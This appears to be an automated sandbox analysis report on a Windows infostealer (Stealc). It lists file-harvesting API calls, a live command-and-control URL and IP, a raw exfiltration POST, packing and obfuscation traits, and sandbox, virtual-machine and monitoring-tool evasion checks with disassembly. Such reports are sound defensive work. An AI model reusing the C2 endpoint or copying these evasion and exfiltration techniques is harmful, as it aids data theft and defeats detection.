Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_000F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_000EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_000EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_000EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000E16D0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 42 44 43 44 38 41 33 44 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"53BDCD8A3D9D1524750037------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_000E4880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7b0923665da6f1
Source: file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHRPb
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37v

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848	0_2_00412848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B1170	0_2_004B1170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0046C9C4	0_2_0046C9C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B6380	0_2_004B6380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041738D	0_2_0041738D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B2C63	0_2_004B2C63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A74C6	0_2_004A74C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004AA4BD	0_2_004AA4BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0049C563	0_2_0049C563
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BCD23	0_2_004BCD23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0057F5D6	0_2_0057F5D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B7E77	0_2_004B7E77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004AF68D	0_2_004AF68D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003E7EDF	0_2_003E7EDF

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 000E45C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: zlzhjqsn ZLIB complexity 0.9950953584558824

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_000F9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_000F3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UX9THANN.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1897472 > 1048576

Source: file.exe

Static PE information: Raw size of zlzhjqsn is bigger than: 0x100000 < 0x1a9000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zlzhjqsn:EW;kjlhrbah:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zlzhjqsn:EW;kjlhrbah:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_000F9860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1db9bd should be: 0x1d5331

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: zlzhjqsn
Source: file.exe	Static PE information: section name: kjlhrbah
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push ebx; mov dword ptr [esp], 49B1D488h	0_2_0041285E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push 5F9963D8h; mov dword ptr [esp], esi	0_2_004128C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push edi; mov dword ptr [esp], ecx	0_2_004129C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push 68C06886h; mov dword ptr [esp], edx	0_2_004129CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push 0FDF1D17h; mov dword ptr [esp], edi	0_2_00412A83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push edi; mov dword ptr [esp], 48F34100h	0_2_00412A88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412848 push eax; mov dword ptr [esp], esi	0_2_00412AB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push 3F0CDF26h; mov dword ptr [esp], ebx	0_2_0079C100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push esi; mov dword ptr [esp], 2199DFF4h	0_2_0079C11F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push ecx; mov dword ptr [esp], 60A9E047h	0_2_0079C131
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C053 push 70E9487Ah; mov dword ptr [esp], ecx	0_2_0079C160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C0861 push edx; mov dword ptr [esp], eax	0_2_004C0865
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FB035 push ecx; ret	0_2_000FB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00521818 push ebx; mov dword ptr [esp], eax	0_2_00521826
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push ecx; mov dword ptr [esp], 4FA3DA43h	0_2_0079C035
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push 3F0CDF26h; mov dword ptr [esp], ebx	0_2_0079C100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push esi; mov dword ptr [esp], 2199DFF4h	0_2_0079C11F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push ecx; mov dword ptr [esp], 60A9E047h	0_2_0079C131
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C01B push 70E9487Ah; mov dword ptr [esp], ecx	0_2_0079C160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0059903C push eax; mov dword ptr [esp], esp	0_2_00599080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055B0DD push eax; mov dword ptr [esp], ecx	0_2_0055B130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D10D9 push eax; mov dword ptr [esp], ebx	0_2_004D3704
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0057F0EC push edx; mov dword ptr [esp], ebx	0_2_0057F120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0057F0EC push ecx; mov dword ptr [esp], esi	0_2_0057F171
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF896 push edx; mov dword ptr [esp], 1A5D505Dh	0_2_005CF92A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF896 push edx; mov dword ptr [esp], 6EF0AF82h	0_2_005CF98C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF896 push 238F0BC2h; mov dword ptr [esp], edi	0_2_005CFA43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D28D6 push ebp; mov dword ptr [esp], ecx	0_2_003D28FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00344938 push 653564A0h; mov dword ptr [esp], eax	0_2_0034935F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0056A174 push ebp; mov dword ptr [esp], ecx	0_2_0056A194
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0059296B push 43ABD101h; mov dword ptr [esp], eax	0_2_005929A9

Source: file.exe

Static PE information: section name: zlzhjqsn entropy: 7.955253982546698

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_000F9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 342155 second address: 342169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jnp 00007F8B150D74F0h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 342169 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 cmc 0x00000007 push dword ptr [ebp+122D0421h] 0x0000000d mov dword ptr [ebp+122D1C3Eh], esi 0x00000013 call dword ptr [ebp+122D1BC1h] 0x00000019 pushad 0x0000001a xor dword ptr [ebp+122D218Ch], ecx 0x00000020 xor eax, eax 0x00000022 jnl 00007F8B146BCD65h 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c sub dword ptr [ebp+122D218Ch], edi 0x00000032 mov dword ptr [ebp+122D2B01h], eax 0x00000038 jns 00007F8B146BCD5Fh 0x0000003e pushad 0x0000003f cld 0x00000040 je 00007F8B146BCD56h 0x00000046 popad 0x00000047 mov esi, 0000003Ch 0x0000004c sub dword ptr [ebp+122D218Ch], edi 0x00000052 sub dword ptr [ebp+122D218Ch], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c add dword ptr [ebp+122D218Ch], ebx 0x00000062 lodsw 0x00000064 jnp 00007F8B146BCD5Ch 0x0000006a mov dword ptr [ebp+122D19ADh], ebx 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jne 00007F8B146BCD5Ch 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D218Ch], ebx 0x00000084 pushad 0x00000085 add dword ptr [ebp+122D19ADh], edx 0x0000008b add edx, 33F31554h 0x00000091 popad 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 pushad 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 341A0B second address: 341A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 341A11 second address: 341A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE301 second address: 4BE30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8B150D74E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE30E second address: 4BE312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2C7B second address: 4C2C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F8B150D74E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2C89 second address: 4C2C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2F89 second address: 4C2FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jmp 00007F8B150D74EFh 0x0000000d jmp 00007F8B150D74F9h 0x00000012 pop edx 0x00000013 jnp 00007F8B150D74E8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2FC2 second address: 4C2FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8B146BCD56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2FCE second address: 4C2FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2FD2 second address: 4C2FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C313D second address: 4C3151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8B150D74ECh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C354A second address: 4C355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BCD5Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C71F8 second address: 4C7202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7202 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 1700900Ah 0x0000000d push eax 0x0000000e mov edx, dword ptr [ebp+122D1963h] 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D0421h] 0x0000001b mov dword ptr [ebp+122D1987h], ebx 0x00000021 call dword ptr [ebp+122D1BC1h] 0x00000027 pushad 0x00000028 xor dword ptr [ebp+122D218Ch], ecx 0x0000002e xor eax, eax 0x00000030 jnl 00007F8B146BCD65h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a sub dword ptr [ebp+122D218Ch], edi 0x00000040 mov dword ptr [ebp+122D2B01h], eax 0x00000046 jns 00007F8B146BCD5Fh 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D218Ch], edi 0x00000057 sub dword ptr [ebp+122D218Ch], esi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D218Ch], ebx 0x00000067 lodsw 0x00000069 jnp 00007F8B146BCD5Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jne 00007F8B146BCD5Ch 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d sub dword ptr [ebp+122D218Ch], ebx 0x00000083 pushad 0x00000084 add dword ptr [ebp+122D19ADh], edx 0x0000008a add edx, 33F31554h 0x00000090 popad 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7267 second address: 4C72D0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B150D74FDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edi, bx 0x00000010 jmp 00007F8B150D74ECh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F8B150D74E8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov si, ACDCh 0x00000035 push 75E7CCD1h 0x0000003a jo 00007F8B150D74EEh 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C72D0 second address: 4C7335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 xor dword ptr [esp], 75E7CC51h 0x0000000c movzx edi, di 0x0000000f push 00000003h 0x00000011 movzx ecx, si 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D1ADDh], ecx 0x0000001c push 00000003h 0x0000001e push BF3959B3h 0x00000023 push ebx 0x00000024 push eax 0x00000025 pushad 0x00000026 popad 0x00000027 pop eax 0x00000028 pop ebx 0x00000029 xor dword ptr [esp], 7F3959B3h 0x00000030 mov dword ptr [ebp+122D19E2h], esi 0x00000036 lea ebx, dword ptr [ebp+1245916Ch] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F8B146BCD68h 0x00000045 jmp 00007F8B146BCD5Ch 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C741F second address: 4C7434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7434 second address: 4C746C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a jmp 00007F8B146BCD64h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8B146BCD5Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C746C second address: 4C7470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
